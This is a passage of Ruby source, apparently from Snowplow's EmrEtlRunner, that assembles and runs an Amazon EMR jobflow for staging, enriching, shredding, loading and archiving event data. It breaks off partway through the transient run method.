STANDARD_HOSTED_ASSETS = "s3://snowplow-hosted-assets"
ENRICH_STEP_INPUT = 'hdfs:///local/snowplow/raw-events/'
ENRICH_STEP_OUTPUT = 'hdfs:///local/snowplow/enriched-events/'
SHRED_STEP_OUTPUT = 'hdfs:///local/snowplow/shredded-events/'
SHRED_JOB_WITH_PROCESSING_MANIFEST = Gem::Version.new('0.14.0-rc1')
SHRED_JOB_WITH_TSV_OUTPUT = Gem::Version.new('0.16.0-rc1')
RDB_LOADER_WITH_PROCESSING_MANIFEST = Gem::Version.new('0.15.0-rc4')
AMI_4 = Gem::Version.new("4.0.0")
AMI_5 = Gem::Version.new("5.0.0")
# Need to understand the status of all our jobflow steps
@@running_states = Set.new(%w(WAITING RUNNING PENDING SHUTTING_DOWN))
@@failed_states = Set.new(%w(FAILED CANCELLED))
include Monitoring::Logging
include Snowplow::EmrEtlRunner::Utils
include Snowplow::EmrEtlRunner::S3
include Snowplow::EmrEtlRunner::EMR
# Initializes our wrapper for the Amazon EMR client.
Contract Bool, Bool, Bool, Bool, Bool, Bool, Bool, Bool, ArchiveStep, ArchiveStep, ConfigHash, ArrayOf[String], String, TargetsHash, RdbLoaderSteps, Bool, String => EmrJob
def initialize(debug, staging, enrich, staging_stream_enrich, shred, es, archive_raw, rdb_load, archive_enriched, archive_shredded, config, enrichments_array, resolver, targets, rdbloader_steps, use_persistent_jobflow, persistent_jobflow_duration)
logger.debug "Initializing EMR jobflow"
# Configuration
custom_assets_bucket =
get_hosted_assets_bucket(STANDARD_HOSTED_ASSETS, config[:aws][:s3][:buckets][:assets], config[:aws][:emr][:region])
standard_assets_bucket =
get_hosted_assets_bucket(STANDARD_HOSTED_ASSETS, STANDARD_HOSTED_ASSETS, config[:aws][:emr][:region])
assets = get_assets(
custom_assets_bucket,
config.dig(:enrich, :versions, :spark_enrich),
config[:storage][:versions][:rdb_shredder],
config[:storage][:versions][:hadoop_elasticsearch],
config[:storage][:versions][:rdb_loader])
collector_format = config.dig(:collectors, :format)
@run_tstamp = Time.new
run_id = @run_tstamp.strftime("%Y-%m-%d-%H-%M-%S")
@run_id = run_id
@rdb_loader_log_base = config[:aws][:s3][:buckets][:log] + "rdb-loader/#{@run_id}/"
etl_tstamp = (@run_tstamp.to_f * 1000).to_i.to_s
output_codec = output_codec_from_compression_format(config.dig(:enrich, :output_compression))
encrypted = config[:aws][:s3][:buckets][:encrypted]
s3 = Aws::S3::Client.new(
:access_key_id => config[:aws][:access_key_id],
:secret_access_key => config[:aws][:secret_access_key],
:region => config[:aws][:s3][:region])
ami_version = Gem::Version.new(config[:aws][:emr][:ami_version])
shredder_version = Gem::Version.new(config[:storage][:versions][:rdb_shredder])
# Configure Elasticity with your AWS credentials
Elasticity.configure do |c|
c.access_key = config[:aws][:access_key_id]
c.secret_key = config[:aws][:secret_access_key]
end
# Create a job flow
@use_persistent_jobflow = use_persistent_jobflow
@persistent_jobflow_duration_s = parse_duration(persistent_jobflow_duration)
found_persistent_jobflow = false
if use_persistent_jobflow
emr = Elasticity::EMR.new(:region => config[:aws][:emr][:region])
emr_jobflow_id = get_emr_jobflow_id(emr, config[:aws][:emr][:jobflow][:job_name])
if emr_jobflow_id.nil?
@jobflow = Elasticity::JobFlow.new
else
@jobflow = get_emr_jobflow(emr_jobflow_id, config[:aws][:emr][:region])
found_persistent_jobflow = true
end
@jobflow.action_on_failure = "CANCEL_AND_WAIT"
@jobflow.keep_job_flow_alive_when_no_steps = true
else
@jobflow = Elasticity::JobFlow.new
end
# Configure
@jobflow.name = config[:aws][:emr][:jobflow][:job_name]
if ami_version < AMI_4
@legacy = true
@jobflow.ami_version = config[:aws][:emr][:ami_version]
else
@legacy = false
@jobflow.release_label = "emr-#{config[:aws][:emr][:ami_version]}"
end
@jobflow.tags = config[:monitoring][:tags]
@jobflow.ec2_key_name = config[:aws][:emr][:ec2_key_name]
@jobflow.region = config[:aws][:emr][:region]
@jobflow.job_flow_role = config[:aws][:emr][:jobflow_role] # Note job_flow vs jobflow
@jobflow.service_role = config[:aws][:emr][:service_role]
@jobflow.placement = config[:aws][:emr][:placement]
@jobflow.additional_info = config[:aws][:emr][:additional_info]
unless config[:aws][:emr][:ec2_subnet_id].nil? # Nils placement so do last and conditionally
@jobflow.ec2_subnet_id = config[:aws][:emr][:ec2_subnet_id]
end
unless config[:aws][:emr][:security_configuration].nil?
@jobflow.security_configuration = config[:aws][:emr][:security_configuration]
end
@jobflow.log_uri = config[:aws][:s3][:buckets][:log]
@jobflow.enable_debugging = debug
@jobflow.visible_to_all_users = true
@jobflow.master_instance_type = config[:aws][:emr][:jobflow][:master_instance_type]
@jobflow.timeout = 120
s3_endpoint = get_s3_endpoint(config[:aws][:s3][:region])
csbr = config[:aws][:s3][:buckets][:raw]
csbe = config[:aws][:s3][:buckets][:enriched]
csbs = config[:aws][:s3][:buckets][:shredded]
@pending_jobflow_steps = []
# Clear HDFS if persistent jobflow has been found
if found_persistent_jobflow
submit_jobflow_step(get_rmr_step([ENRICH_STEP_INPUT, ENRICH_STEP_OUTPUT, SHRED_STEP_OUTPUT], standard_assets_bucket, "Empty Snowplow HDFS"), use_persistent_jobflow)
submit_jobflow_step(get_hdfs_expunge_step, use_persistent_jobflow)
end
# staging
if staging
unless empty?(s3, csbr[:processing])
raise DirectoryNotEmptyError, "Cannot safely add staging step to jobflow, #{csbr[:processing]} is not empty"
end
src_pattern = collector_format == 'clj-tomcat' ? '.*localhost\_access\_log.*\.txt.*' : '.+'
src_pattern_regex = Regexp.new src_pattern
non_empty_locs = csbr[:in].select { |l|
not empty?(s3, l,
lambda { |k| !(k =~ /\/$/) and !(k =~ /\$folder\$$/) and !(k =~ src_pattern_regex).nil? })
}
if non_empty_locs.empty?
raise NoDataToProcessError, "No Snowplow logs to process since last run"
else
non_empty_locs.each { |l|
staging_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
staging_step.arguments = [
"--src", l,
"--dest", csbr[:processing],
"--s3Endpoint", s3_endpoint,
"--srcPattern", src_pattern,
"--deleteOnSuccess"
]
if collector_format == 'clj-tomcat'
staging_step.arguments = staging_step.arguments + [ '--groupBy', '.*/_*(.+)' ]
end
if encrypted
staging_step.arguments = staging_step.arguments + [ '--s3ServerSideEncryption' ]
end
staging_step.name = "[staging] s3-dist-cp: Raw #{l} -> Raw Staging S3"
staging_step_config = {:step => staging_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(staging_step_config, use_persistent_jobflow)
}
end
end
@jobflow.add_application("Hadoop") unless found_persistent_jobflow
if collector_format == 'thrift'
if @legacy
[
Elasticity::HadoopBootstrapAction.new('-c', 'io.file.buffer.size=65536'),
Elasticity::HadoopBootstrapAction.new('-m', 'mapreduce.user.classpath.first=true')
].each do |action|
@jobflow.add_bootstrap_action(action) unless found_persistent_jobflow
end
else
[{
"Classification" => "core-site",
"Properties" => {
"io.file.buffer.size" => "65536"
}
},
{
"Classification" => "mapred-site",
"Properties" => {
"mapreduce.user.classpath.first" => "true"
}
}].each do |config|
@jobflow.add_configuration(config) unless found_persistent_jobflow
end
end
end
# Add custom bootstrap actions
bootstrap_actions = config[:aws][:emr][:bootstrap]
unless bootstrap_actions.nil?
bootstrap_actions.each do |bootstrap_action|
@jobflow.add_bootstrap_action(Elasticity::BootstrapAction.new(bootstrap_action)) unless found_persistent_jobflow
end
end
# Prepare a bootstrap action based on the AMI version
bootstrap_script_location = if ami_version < AMI_4
"#{standard_assets_bucket}common/emr/snowplow-ami3-bootstrap-0.1.0.sh"
elsif ami_version >= AMI_4 && ami_version < AMI_5
"#{standard_assets_bucket}common/emr/snowplow-ami4-bootstrap-0.2.0.sh"
else
"#{standard_assets_bucket}common/emr/snowplow-ami5-bootstrap-0.1.0.sh"
end
cc_version = get_cc_version(config.dig(:enrich, :versions, :spark_enrich))
@jobflow.add_bootstrap_action(Elasticity::BootstrapAction.new(bootstrap_script_location, cc_version)) unless found_persistent_jobflow
# Install and launch HBase
hbase = config[:aws][:emr][:software][:hbase]
unless not hbase
install_hbase_action = Elasticity::BootstrapAction.new("s3://#{config[:aws][:emr][:region]}.elasticmapreduce/bootstrap-actions/setup-hbase")
@jobflow.add_bootstrap_action(install_hbase_action) unless found_persistent_jobflow
start_hbase_step = Elasticity::CustomJarStep.new("/home/hadoop/lib/hbase-#{hbase}.jar")
start_hbase_step.name = "Start HBase #{hbase}"
start_hbase_step.arguments = [ 'emr.hbase.backup.Main', '--start-master' ]
# NOTE: Presumes that HBase will remain available for a persistent cluster
start_hbase_step_config = {:step => start_hbase_step, :retry_on_fail => false, :rdb_loader_log => nil}
submit_jobflow_step(start_hbase_step_config, use_persistent_jobflow) unless found_persistent_jobflow
end
# Install Lingual
lingual = config[:aws][:emr][:software][:lingual]
unless not lingual
install_lingual_action = Elasticity::BootstrapAction.new("s3://files.concurrentinc.com/lingual/#{lingual}/lingual-client/install-lingual-client.sh")
@jobflow.add_bootstrap_action(install_lingual_action) unless found_persistent_jobflow
end
# EMR configuration: Spark, YARN, etc
configuration = config[:aws][:emr][:configuration]
unless configuration.nil?
configuration.each do |k, h|
@jobflow.add_configuration({"Classification" => k, "Properties" => h}) unless found_persistent_jobflow
end
end
# Now let's add our core group
core_instance_group = Elasticity::InstanceGroup.new.tap { |ig|
ig.type = config[:aws][:emr][:jobflow][:core_instance_type]
ig.count = config[:aws][:emr][:jobflow][:core_instance_count]
# check if bid exists
cib = config[:aws][:emr][:jobflow][:core_instance_bid]
if cib.nil?
ig.set_on_demand_instances
else
ig.set_spot_instances(cib)
end
}
@jobflow.set_core_instance_group(core_instance_group)
# Now let's add our task group if required
tic = config[:aws][:emr][:jobflow][:task_instance_count]
if tic > 0
instance_group = Elasticity::InstanceGroup.new.tap { |ig|
ig.count = tic
ig.type = config[:aws][:emr][:jobflow][:task_instance_type]
tib = config[:aws][:emr][:jobflow][:task_instance_bid]
if tib.nil?
ig.set_on_demand_instances
else
ig.set_spot_instances(tib)
end
}
@jobflow.set_task_instance_group(instance_group)
end
# EBS
unless config[:aws][:emr][:jobflow][:core_instance_ebs].nil?
ebs_bdc = Elasticity::EbsBlockDeviceConfig.new
ebs_bdc.volume_type = config[:aws][:emr][:jobflow][:core_instance_ebs][:volume_type]
ebs_bdc.size_in_gb = config[:aws][:emr][:jobflow][:core_instance_ebs][:volume_size]
ebs_bdc.volumes_per_instance = 1
if config[:aws][:emr][:jobflow][:core_instance_ebs][:volume_type] == "io1"
ebs_bdc.iops = config[:aws][:emr][:jobflow][:core_instance_ebs][:volume_iops]
end
ebs_c = Elasticity::EbsConfiguration.new
ebs_c.add_ebs_block_device_config(ebs_bdc)
ebs_c.ebs_optimized = true
unless config[:aws][:emr][:jobflow][:core_instance_ebs][:ebs_optimized].nil?
ebs_c.ebs_optimized = config[:aws][:emr][:jobflow][:core_instance_ebs][:ebs_optimized]
end
@jobflow.set_core_ebs_configuration(ebs_c)
end
stream_enrich_mode = !csbe[:stream].nil?
# Get full path when we need to move data to enrich_final_output
# otherwise (when enriched/good is non-empty already)
# we can list files withing folders using '*.'-regexps
enrich_final_output = if enrich || staging_stream_enrich
partition_by_run(csbe[:good], run_id)
else
csbe[:good]
end
if enrich
raw_input = csbr[:processing]
# When resuming from enrich, we need to check for emptiness of the processing bucket
if !staging and empty?(s3, raw_input)
raise NoDataToProcessError, "No Snowplow logs in #{raw_input}, can't resume from enrich"
end
# for ndjson/urbanairship we can group by everything, just aim for the target size
group_by = is_ua_ndjson(collector_format) ? ".*\/(\w+)\/.*" : ".*([0-9]+-[0-9]+-[0-9]+)-[0-9]+.*"
# Create the Hadoop MR step for the file crushing
compact_to_hdfs_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
compact_to_hdfs_step.arguments = [
"--src" , raw_input,
"--dest" , ENRICH_STEP_INPUT,
"--s3Endpoint" , s3_endpoint
] + [
"--groupBy" , group_by,
"--targetSize" , "128",
"--outputCodec" , "lzo"
].select { |el|
is_cloudfront_log(collector_format) || is_ua_ndjson(collector_format)
}
# uncompress events that are gzipped since this format is unsplittable and causes issues
# downstream in the spark enrich job snowplow/snowplow#3525
if collector_format == "clj-tomcat" then
compact_to_hdfs_step.arguments << "--outputCodec" << "none"
end
if encrypted
compact_to_hdfs_step.arguments = compact_to_hdfs_step.arguments + [ '--s3ServerSideEncryption' ]
end
compact_to_hdfs_step.name = "[enrich] s3-dist-cp: Raw S3 -> Raw HDFS"
compact_to_hdfs_step_config = {:step => compact_to_hdfs_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(compact_to_hdfs_step_config, use_persistent_jobflow)
# 2. Enrichment
enrich_asset = if assets[:enrich].nil?
raise ConfigError, "Cannot add enrich step as spark_enrich version is not configured"
else
assets[:enrich]
end
enrich_version = config.dig(:enrich, :versions, :spark_enrich)
enrich_step =
if is_spark_enrich(enrich_version) then
@jobflow.add_application("Spark") unless found_persistent_jobflow
build_spark_step(
"[enrich] spark: Enrich Raw Events",
enrich_asset,
"enrich.spark.EnrichJob",
{ :in => glob_path(ENRICH_STEP_INPUT),
:good => ENRICH_STEP_OUTPUT,
:bad => partition_by_run(csbe[:bad], run_id)
},
{ 'input-format' => collector_format,
'etl-timestamp' => etl_tstamp,
'iglu-config' => build_iglu_config_json(resolver),
'enrichments' => build_enrichments_json(enrichments_array)
}
)
else
build_scalding_step(
"[enrich] scalding: Enrich Raw Events",
enrich_asset,
"enrich.hadoop.EtlJob",
{ :in => glob_path(ENRICH_STEP_INPUT),
:good => ENRICH_STEP_OUTPUT,
:bad => partition_by_run(csbe[:bad], run_id),
:errors => partition_by_run(csbe[:errors], run_id, config.dig(:enrich, :continue_on_unexpected_error))
},
{ :input_format => collector_format,
:etl_tstamp => etl_tstamp,
:iglu_config => build_iglu_config_json(resolver),
:enrichments => build_enrichments_json(enrichments_array)
}
)
end
# Late check whether our enrichment directory is empty. We do an early check too
unless empty?(s3, csbe[:good])
raise DirectoryNotEmptyError, "Cannot safely add enrichment step to jobflow, #{csbe[:good]} is not empty"
end
enrich_step_config = {:step => enrich_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(enrich_step_config, use_persistent_jobflow)
# We need to copy our enriched events from HDFS back to S3
copy_to_s3_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_to_s3_step.arguments = [
"--src" , ENRICH_STEP_OUTPUT,
"--dest" , enrich_final_output,
"--groupBy" , PARTFILE_GROUPBY_REGEXP,
"--targetSize", "24",
"--s3Endpoint", s3_endpoint
] + output_codec
if encrypted
copy_to_s3_step.arguments = copy_to_s3_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_to_s3_step.name = "[enrich] spark: Enriched HDFS -> S3"
copy_to_s3_step_config = {:step => copy_to_s3_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_to_s3_step_config, use_persistent_jobflow)
copy_success_file_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_success_file_step.arguments = [
"--src" , ENRICH_STEP_OUTPUT,
"--dest" , enrich_final_output,
"--srcPattern" , SUCCESS_REGEXP,
"--s3Endpoint" , s3_endpoint
]
if encrypted
copy_success_file_step.arguments = copy_success_file_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_success_file_step.name = "[enrich] spark: Enriched HDFS _SUCCESS -> S3"
copy_success_file_step_config = {:step => copy_success_file_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_success_file_step_config, use_persistent_jobflow)
end
# Staging data produced by Stream Enrich
if staging_stream_enrich
unless empty?(s3, csbe[:good])
raise DirectoryNotEmptyError, "Cannot safely add stream staging step to jobflow, #{csbe[:good]} is not empty"
end
src_pattern_regex = Regexp.new STREAM_ENRICH_REGEXP
if empty?(s3, csbe[:stream], lambda { |k| !(k =~ /\/$/) and !(k =~ /\$folder\$$/) and !(k =~ src_pattern_regex).nil? })
raise NoDataToProcessError, "No Snowplow enriched stream logs to process since last run"
end
staging_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
staging_step.arguments = [
"--src" , csbe[:stream],
"--dest" , enrich_final_output,
"--s3Endpoint" , s3_endpoint,
"--srcPattern" , STREAM_ENRICH_REGEXP,
"--deleteOnSuccess"
]
if encrypted
staging_step.arguments = staging_step.arguments + [ '--s3ServerSideEncryption' ]
end
staging_step.name = "[staging_stream_enrich] s3-dist-cp: Stream Enriched #{csbe[:stream]} -> Enriched Staging S3"
staging_step_config = {:step => staging_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(staging_step_config, use_persistent_jobflow)
end
if shred
# 3. Shredding
shred_final_output = partition_by_run(csbs[:good], run_id)
# Add processing manifest if available
processing_manifest = get_processing_manifest(targets)
processing_manifest_shred_args =
if not processing_manifest.nil?
if shredder_version >= SHRED_JOB_WITH_PROCESSING_MANIFEST
{ 'processing-manifest-table' => processing_manifest, 'item-id' => shred_final_output }
else
{}
end
else
{}
end
# Add target config JSON if necessary
storage_target_shred_args = get_rdb_shredder_target(config, targets[:ENRICHED_EVENTS])
# If we enriched, we free some space on HDFS by deleting the raw events
# otherwise we need to copy the enriched events back to HDFS
if enrich
submit_jobflow_step(get_rmr_step([ENRICH_STEP_INPUT], standard_assets_bucket, "Empty Raw HDFS"), use_persistent_jobflow)
else
src_pattern = if stream_enrich_mode then STREAM_ENRICH_REGEXP else PARTFILE_REGEXP end
copy_to_hdfs_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_to_hdfs_step.arguments = [
"--src" , enrich_final_output, # Opposite way round to normal
"--dest" , ENRICH_STEP_OUTPUT,
"--srcPattern" , src_pattern,
"--outputCodec", "none",
"--s3Endpoint" , s3_endpoint
]
if encrypted
copy_to_hdfs_step.arguments = copy_to_hdfs_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_to_hdfs_step.name = "[shred] s3-dist-cp: Enriched S3 -> HDFS"
copy_to_hdfs_step_config = {:step => copy_to_hdfs_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_to_hdfs_step_config, use_persistent_jobflow)
end
shred_step =
if is_rdb_shredder(config[:storage][:versions][:rdb_shredder]) then
@jobflow.add_application("Spark") unless found_persistent_jobflow
duplicate_storage_config = build_duplicate_storage_json(targets[:DUPLICATE_TRACKING], false)
build_spark_step(
"[shred] spark: Shred Enriched Events",
assets[:shred],
"storage.spark.ShredJob",
{ :in => glob_path(ENRICH_STEP_OUTPUT),
:good => SHRED_STEP_OUTPUT,
:bad => partition_by_run(csbs[:bad], run_id)
},
{
'iglu-config' => build_iglu_config_json(resolver)
}.merge(duplicate_storage_config).merge(processing_manifest_shred_args).merge(storage_target_shred_args)
)
else
duplicate_storage_config = build_duplicate_storage_json(targets[:DUPLICATE_TRACKING])
build_scalding_step(
"[shred] scalding: Shred Enriched Events",
assets[:shred],
"enrich.hadoop.ShredJob",
{ :in => glob_path(ENRICH_STEP_OUTPUT),
:good => SHRED_STEP_OUTPUT,
:bad => partition_by_run(csbs[:bad], run_id),
:errors => partition_by_run(csbs[:errors], run_id, config.dig(:enrich, :continue_on_unexpected_error))
},
{
:iglu_config => build_iglu_config_json(resolver)
}.merge(duplicate_storage_config)
)
end
# Late check whether our target directory is empty
unless empty?(s3, csbs[:good])
raise DirectoryNotEmptyError, "Cannot safely add shredding step to jobflow, #{csbs[:good]} is not empty"
end
shred_step_config = {:step => shred_step, :retry_on_fail => false, :rdb_loader_log => nil}
submit_jobflow_step(shred_step_config, use_persistent_jobflow)
# We need to copy our shredded types from HDFS back to S3
# Whether to combine the files outputted by the shred step
consolidate_shredded_output = config[:aws][:s3][:consolidate_shredded_output]
if consolidate_shredded_output
copy_atomic_events_to_s3_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_atomic_events_to_s3_step.arguments = [
"--src" , SHRED_STEP_OUTPUT,
"--dest" , shred_final_output,
"--groupBy" , ATOMIC_EVENTS_PARTFILE_GROUPBY_REGEXP,
"--targetSize", "24",
"--s3Endpoint", s3_endpoint
] + output_codec
if encrypted
copy_atomic_events_to_s3_step.arguments = copy_atomic_events_to_s3_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_atomic_events_to_s3_step.name = "[shred] s3-dist-cp: Shredded atomic events HDFS -> S3"
copy_atomic_events_to_s3_step_config = {:step => copy_atomic_events_to_s3_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_atomic_events_to_s3_step_config, use_persistent_jobflow)
# Copy shredded JSONs (if shredder version < 0.16.0 or >= 0.16.0 and tabularBlacklist non empty)
if should_copy_shredded_JSONs(shredder_version, SHRED_JOB_WITH_TSV_OUTPUT, targets[:ENRICHED_EVENTS])
copy_shredded_types_to_s3_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_shredded_types_to_s3_step.arguments = [
"--src" , SHRED_STEP_OUTPUT,
"--dest" , shred_final_output,
"--groupBy" , SHREDDED_TYPES_PARTFILE_GROUPBY_REGEXP,
"--targetSize", "24",
"--s3Endpoint", s3_endpoint
] + output_codec
if encrypted
copy_shredded_types_to_s3_step.arguments = copy_shredded_types_to_s3_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_shredded_types_to_s3_step.name = "[shred] s3-dist-cp: Shredded JSON types HDFS -> S3"
copy_shredded_types_to_s3_step_config = {:step => copy_shredded_types_to_s3_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_shredded_types_to_s3_step_config, use_persistent_jobflow)
end
# Copy shredded TSVs (if shredder version >= 0.16.0 and tabularBlacklist exists and is an array)
if should_copy_shredded_TSVs(shredder_version, SHRED_JOB_WITH_TSV_OUTPUT, targets[:ENRICHED_EVENTS])
copy_shredded_tsv_types_to_s3_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_shredded_tsv_types_to_s3_step.arguments = [
"--src" , SHRED_STEP_OUTPUT,
"--dest" , shred_final_output,
"--groupBy" , SHREDDED_TSV_TYPES_PARTFILE_GROUPBY_REGEXP,
"--targetSize", "24",
"--s3Endpoint", s3_endpoint
] + output_codec
if encrypted
copy_shredded_tsv_types_to_s3_step.arguments = copy_shredded_tsv_types_to_s3_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_shredded_tsv_types_to_s3_step.name = "[shred] s3-dist-cp: Shredded TSV types HDFS -> S3"
copy_shredded_tsv_types_to_s3_step_config = {:step => copy_shredded_tsv_types_to_s3_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_shredded_tsv_types_to_s3_step_config, use_persistent_jobflow)
end
else
copy_to_s3_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_to_s3_step.arguments = [
"--src" , SHRED_STEP_OUTPUT,
"--dest" , shred_final_output,
"--srcPattern", PARTFILE_REGEXP,
"--s3Endpoint", s3_endpoint
] + output_codec
if encrypted
copy_to_s3_step.arguments = copy_to_s3_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_to_s3_step.name = "[shred] s3-dist-cp: Shredded HDFS -> S3"
copy_to_s3_step_config = {:step => copy_to_s3_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_to_s3_step_config, use_persistent_jobflow)
end
copy_success_file_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_success_file_step.arguments = [
"--src" , SHRED_STEP_OUTPUT,
"--dest" , shred_final_output,
"--srcPattern" , SUCCESS_REGEXP,
"--s3Endpoint" , s3_endpoint
]
if encrypted
copy_success_file_step.arguments = copy_success_file_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_success_file_step.name = "[shred] s3-dist-cp: Shredded HDFS _SUCCESS -> S3"
copy_success_file_step_config = {:step => copy_success_file_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_success_file_step_config, use_persistent_jobflow)
end
if es
get_elasticsearch_steps(config, assets, enrich, shred, targets[:FAILED_EVENTS]).each do |step|
submit_jobflow_step(step, use_persistent_jobflow)
end
end
if archive_raw
# We need to copy our enriched events from HDFS back to S3
archive_raw_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
archive_raw_step.arguments = [
"--src" , csbr[:processing],
"--dest" , partition_by_run(csbr[:archive], run_id),
"--s3Endpoint" , s3_endpoint,
"--deleteOnSuccess"
]
if encrypted
archive_raw_step.arguments = archive_raw_step.arguments + [ '--s3ServerSideEncryption' ]
end
archive_raw_step.name = "[archive_raw] s3-dist-cp: Raw Staging S3 -> Raw Archive S3"
archive_raw_step_config = {:step => archive_raw_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(archive_raw_step_config, use_persistent_jobflow)
end
if rdb_load
rdb_loader_version = Gem::Version.new(config[:storage][:versions][:rdb_loader])
skip_manifest = stream_enrich_mode && rdb_loader_version > RDB_LOADER_WITH_PROCESSING_MANIFEST
get_rdb_loader_steps(config, targets[:ENRICHED_EVENTS], resolver, assets[:loader], rdbloader_steps, skip_manifest).each do |step|
submit_jobflow_step(step, use_persistent_jobflow)
end
end
if archive_enriched == 'pipeline'
archive_enriched_step = get_archive_step(csbe[:good], csbe[:archive], run_id, s3_endpoint, "[archive_enriched] s3-dist-cp: Enriched S3 -> Enriched Archive S3", encrypted)
submit_jobflow_step(archive_enriched_step, use_persistent_jobflow)
elsif archive_enriched == 'recover'
latest_run_id = get_latest_run_id(s3, csbe[:good])
archive_enriched_step = get_archive_step(csbe[:good], csbe[:archive], latest_run_id, s3_endpoint, '[archive_enriched] s3-dist-cp: Enriched S3 -> S3 Enriched Archive', encrypted)
submit_jobflow_step(archive_enriched_step, use_persistent_jobflow)
else # skip
nil
end
if archive_shredded == 'pipeline'
archive_shredded_step = get_archive_step(csbs[:good], csbs[:archive], run_id, s3_endpoint, "[archive_shredded] s3-dist-cp: Shredded S3 -> Shredded Archive S3", encrypted)
submit_jobflow_step(archive_shredded_step, use_persistent_jobflow)
elsif archive_shredded == 'recover'
latest_run_id = get_latest_run_id(s3, csbs[:good], 'atomic-events')
archive_shredded_step = get_archive_step(csbs[:good], csbs[:archive], latest_run_id, s3_endpoint, "[archive_shredded] s3-dist-cp: Shredded S3 -> S3 Shredded Archive", encrypted)
submit_jobflow_step(archive_shredded_step, use_persistent_jobflow)
else # skip
nil
end
self
end
# Create one step for each Elasticsearch target for each source for that target
#
Contract ConfigHash, Hash, Bool, Bool, ArrayOf[Iglu::SelfDescribingJson] => ArrayOf[EmrStepConfig]
def get_elasticsearch_steps(config, assets, enrich, shred, failure_storages)
  # Default sources: the bad-row folders written by this run's enrich/shred phases
  buckets = config[:aws][:s3][:buckets]
  sources = []
  sources << partition_by_run(buckets[:enriched][:bad], @run_id) if enrich
  sources << partition_by_run(buckets[:shredded][:bad], @run_id) if shred

  steps = failure_storages.flat_map do |target|
    sources.map do |source|
      # Omit any argument whose value is nil
      step_arguments = {
        :input => source,
        :host => target.data[:host],
        :port => target.data[:port].to_s,
        :index => target.data[:index],
        :type => target.data[:type],
        :es_nodes_wan_only => target.data[:nodesWanOnly] ? "true" : "false"
      }.reject { |_, value| value.nil? }
      es_step = Elasticity::ScaldingStep.new(
        assets[:elasticsearch],
        "com.snowplowanalytics.snowplow.storage.hadoop.ElasticsearchJob",
        step_arguments
      )
      es_step.name = "Errors in #{source} -> Elasticsearch: #{target.data[:name]}"
      {:step => es_step, :retry_on_fail => false, :rdb_loader_log => nil}
    end
  end

  # Wait 60 seconds before starting the first step so S3 can become consistent
  steps[0][:step].arguments << '--delay' << '60' if (enrich || shred) && steps.any?
  steps
end
# Run (and wait for) the daily ETL job.
#
# Throws a BootstrapFailureError if the job fails due to a bootstrap failure.
# Throws an EmrExecutionError if the jobflow fails for any other reason.
Contract ConfigHash => nil
def run(config)
  # Transient clusters run the whole batch once and shut down
  return run_transient_mode(config) unless @use_persistent_jobflow
  # Persistent clusters are started/expired by the lifecycle manager
  manage_lifecycle_persistent do
    run_persistent_mode(config)
  end
end
# This is the original EER run mode.
# All steps are added at once and the jobflow is left to either succeed or fail
#
# Parameters:
# +config+:: main Snowplow config.yml hash
#
# Raises BootstrapFailureError on a bootstrap failure, EmrExecutionError on any
# other unsuccessful run. Always attempts to shut the cluster down on success.
Contract ConfigHash => nil
def run_transient_mode(config)
  snowplow_tracking_enabled = ! config[:monitoring][:snowplow].nil?
  if snowplow_tracking_enabled
    Monitoring::Snowplow.parameterize(config)
  end
  # Submit every pending step in one batch up front
  @pending_jobflow_steps.each do |step_config|
    add_step_to_jobflow(step_config[:step], snowplow_tracking_enabled)
  end
  # Start the jobflow unless it is already running
  jobflow_id = @jobflow.jobflow_id
  if jobflow_id.nil?
    retry_connection_issues {
      jobflow_id = @jobflow.run
    }
  end
  logger.debug "EMR jobflow #{jobflow_id} started, waiting for jobflow to complete..."
  if snowplow_tracking_enabled
    Monitoring::Snowplow.instance.track_job_started(jobflow_id, cluster_status(@jobflow), cluster_step_status_for_run(@jobflow, @run_tstamp))
  end
  # Block until all steps complete (or fail); attempt counter is 0 (no retries here)
  job_result = wait_for(@run_tstamp)
  output_rdb_loader_logs_for_batch(job_result, @pending_jobflow_steps, config, 0)
  cluster_status = cluster_status(@jobflow)
  cluster_step_status_for_run = cluster_step_status_for_run(@jobflow, @run_tstamp)
  if snowplow_tracking_enabled
    if job_result.successful
      Monitoring::Snowplow.instance.track_job_succeeded(jobflow_id, cluster_status, cluster_step_status_for_run)
    else
      Monitoring::Snowplow.instance.track_job_failed(jobflow_id, cluster_status, cluster_step_status_for_run)
    end
  end
  # Distinguish bootstrap failures (transient, often retriable by caller) from other failures
  if job_result.bootstrap_failure
    raise BootstrapFailureError, get_failure_details(jobflow_id, cluster_status, cluster_step_status_for_run)
  elsif !job_result.successful
